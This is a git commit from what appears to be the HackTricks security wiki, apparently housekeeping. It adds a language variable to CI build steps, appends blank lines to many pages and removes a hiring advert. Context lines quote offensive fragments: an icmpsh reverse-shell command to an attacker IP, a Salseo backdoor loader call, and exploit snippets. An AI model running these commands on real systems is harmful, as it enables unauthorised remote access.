translations 4

2025-10-10 18:36:50 +00:00 · 2025-01-02 21:57:43 +01:00 · 2025-01-02 21:57:43 +01:00 · 61aa4fc5ee
commit 61aa4fc5ee
parent fbf2a0779e
251 changed files with 473 additions and 783 deletions
--- a/.github/workflows/build_master.yml
+++ b/.github/workflows/build_master.yml
@ -47,7 +47,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=en mdbook build
      
      # Cat hacktricks-preprocessor.log
      #- name: Cat hacktricks-preprocessor.log
--- a/.github/workflows/translate_af.yml
+++ b/.github/workflows/translate_af.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_de.yml
+++ b/.github/workflows/translate_de.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_el.yml
+++ b/.github/workflows/translate_el.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_es.yml
+++ b/.github/workflows/translate_es.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_fr.yml
+++ b/.github/workflows/translate_fr.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_in.yml
+++ b/.github/workflows/translate_in.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_it.yml
+++ b/.github/workflows/translate_it.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_ja.yml
+++ b/.github/workflows/translate_ja.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_ko.yml
+++ b/.github/workflows/translate_ko.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_pl.yml
+++ b/.github/workflows/translate_pl.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_pt.yml
+++ b/.github/workflows/translate_pt.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_sr.yml
+++ b/.github/workflows/translate_sr.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_sw.yml
+++ b/.github/workflows/translate_sw.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_tr.yml
+++ b/.github/workflows/translate_tr.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_uk.yml
+++ b/.github/workflows/translate_uk.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/.github/workflows/translate_zh.yml
+++ b/.github/workflows/translate_zh.yml
@ -105,7 +105,7 @@ jobs:

      # Build the mdBook
      - name: Build mdBook
-        run: mdbook build
+        run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
      
      # Login in AWs
      - name: Configure AWS credentials using OIDC
--- a/src/backdoors/icmpsh.md
+++ b/src/backdoors/icmpsh.md
@ -29,3 +29,5 @@ icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
 ```

 {{#include ../banners/hacktricks-training.md}}
+
+
--- a/src/backdoors/salseo.md
+++ b/src/backdoors/salseo.md
@ -176,3 +176,5 @@ rundll32.exe SalseoLoader.dll,main
 ```

 {{#include ../banners/hacktricks-training.md}}
+
+
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@ -11,3 +11,5 @@
 > - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 >
 > </details>
+
+
--- a/src/binary-exploitation/arbitrary-write-2-exec/README.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md
@ -1,3 +1,5 @@
 # Arbitrary Write 2 Exec


+
+
--- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
@ -70,3 +70,5 @@ Now a **fast bin attack** is performed:
 - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
@ -87,3 +87,5 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
 - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md
@ -54,3 +54,5 @@ In order to abuse **`.fini_array`** to get an eternal loop you can [**check what
 > In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
@ -236,3 +236,5 @@ To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and th
 You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure).

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/array-indexing.md
+++ b/src/binary-exploitation/array-indexing.md
@ -16,3 +16,5 @@ However he you can find some nice **examples**:
  - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.
 - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
  - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).
+
+
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
@ -109,3 +109,5 @@ Something to take into account is that usually **just one exploitation of a vuln
 - [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
@ -394,3 +394,5 @@ Each variable will hace an entry in the TLS header specifying the size and the T
 The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md
@ -239,3 +239,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
 ![](<../../../images/image (858).png>)

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
@ -174,3 +174,5 @@ pwn update
 ```

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md
@ -33,3 +33,5 @@ gdb /path/to/executable /path/to/core_file
 This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
@ -302,3 +302,5 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
 {{#endref}}

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md
@ -80,3 +80,5 @@ p.interactive()
  - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md
@ -31,3 +31,5 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md)

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
@ -23,3 +23,5 @@ The **shadow stack** is a **dedicated stack used solely for storing return addre
 - The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
@ -82,3 +82,5 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored
 - [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
@ -82,3 +82,5 @@ When a **mismatch is detected** the kernel will **panic** to prevent further exp
 - [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md
@ -14,3 +14,5 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
  - **Ret2...**

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md
@ -30,3 +30,5 @@ bypassing-canary-and-pie.md
 - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie)

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@ -94,3 +94,5 @@ According to [**some observation from this post**](https://github.com/florianhof
 According to that blog post it's recommended to add a short delay between requests to the server is introduced.

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md
@ -33,3 +33,5 @@ If Full RELRO is enabled, the only way to bypass it is to find another way that
 Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.**

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md
@ -74,3 +74,5 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/
 - [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/)

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@ -119,3 +119,5 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca

 - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
  - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
+
+
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
@ -31,3 +31,5 @@ With an **arbitrary read** like the one provided by format **strings** it might
  - This challenge abuses in a very simple way a format string to read the canary from the stack

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/common-exploiting-problems.md
+++ b/src/binary-exploitation/common-exploiting-problems.md
@ -36,3 +36,5 @@ In order to bypass this the **escape character `\x16` must be prepended to any `
 **Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**

 {{#include ../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/format-strings/README.md
+++ b/src/binary-exploitation/format-strings/README.md
@ -2,11 +2,6 @@

 {{#include ../../banners/hacktricks-training.md}}

-<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}

 ## Basic Information

@ -242,10 +237,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w
 - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
  - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands.

-<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
+++ b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@ -182,3 +182,5 @@ p.close()
 <figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/format-strings/format-strings-template.md
+++ b/src/binary-exploitation/format-strings/format-strings-template.md
@ -143,3 +143,5 @@ P.interactive()
 ```

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/integer-overflow.md
+++ b/src/binary-exploitation/integer-overflow.md
@ -121,3 +121,5 @@ In this example, if a user inputs a negative number, it will be interpreted as a
 This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).

 {{#include ../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/ios-exploiting.md
+++ b/src/binary-exploitation/ios-exploiting.md
@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {

 With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).

+
+
--- a/src/binary-exploitation/libc-heap/README.md
+++ b/src/binary-exploitation/libc-heap/README.md
@ -527,3 +527,5 @@ heap-memory-functions/heap-functions-security-checks.md

 - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
 - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
+
+
--- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md
+++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md
@ -638,3 +638,5 @@ heap-memory-functions/heap-functions-security-checks.md
 - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/double-free.md
+++ b/src/binary-exploitation/libc-heap/double-free.md
@ -130,3 +130,5 @@ h1: 0xaaab0f0c2380
 - [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/fast-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md
@ -151,3 +151,5 @@ unsorted-bin-attack.md
 {{#endref}}

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
@ -5,3 +5,5 @@
 ##

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md
@ -384,3 +384,5 @@ _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size)
 </details>

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md
@ -161,3 +161,5 @@ free.md
    - Error message: `realloc(): invalid next size`

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md
@ -1744,3 +1744,5 @@ sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av)
 </details>

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md
@ -81,3 +81,5 @@ Heap leaks:
 - If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/heap-overflow.md
+++ b/src/binary-exploitation/libc-heap/heap-overflow.md
@ -48,3 +48,5 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
  - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-einherjar.md
+++ b/src/binary-exploitation/libc-heap/house-of-einherjar.md
@ -47,3 +47,5 @@
  - Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-force.md
+++ b/src/binary-exploitation/libc-heap/house-of-force.md
@ -62,3 +62,5 @@ Then, do another malloc to get a chunk at the target address.
  - Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-lore.md
+++ b/src/binary-exploitation/libc-heap/house-of-lore.md
@ -45,3 +45,5 @@ Then you will be able to allocate `fake0`.
 - [https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-orange.md
+++ b/src/binary-exploitation/libc-heap/house-of-orange.md
@ -73,3 +73,5 @@ This approach exploits heap management mechanisms, libc information leaks, and h
 - [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-rabbit.md
+++ b/src/binary-exploitation/libc-heap/house-of-rabbit.md
@ -109,3 +109,5 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo
 The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-roman.md
+++ b/src/binary-exploitation/libc-heap/house-of-roman.md
@ -116,3 +116,5 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the
 - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/house-of-spirit.md
+++ b/src/binary-exploitation/libc-heap/house-of-spirit.md
@ -116,3 +116,5 @@ int main() {
 - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/large-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/large-bin-attack.md
@ -56,3 +56,5 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http
  - FSOP is needed to finish the exploit.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/off-by-one-overflow.md
+++ b/src/binary-exploitation/libc-heap/off-by-one-overflow.md
@ -113,3 +113,5 @@ This image explains perfectly the attack:
  - Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md
+++ b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md
@ -21,3 +21,5 @@ It might be possible to **overflow an allocated chunk having next a freed chunk*
 In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md
@ -45,3 +45,5 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
  - **Tcache poisoning** to get an arbitrary write primitive.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/unlink-attack.md
+++ b/src/binary-exploitation/libc-heap/unlink-attack.md
@ -127,3 +127,5 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before
    - There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md
@ -71,3 +71,5 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
  - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/use-after-free/README.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/README.md
@ -18,3 +18,5 @@ first-fit.md
 {{#endref}}

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
@ -62,3 +62,5 @@ d = malloc(20);   // a
  - It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag.
 - [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html)
  - In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it.
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/README.md
@ -193,3 +193,5 @@ rop-syscall-execv/
  - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
@ -122,3 +122,5 @@ Behaviour signatures to find those functions:
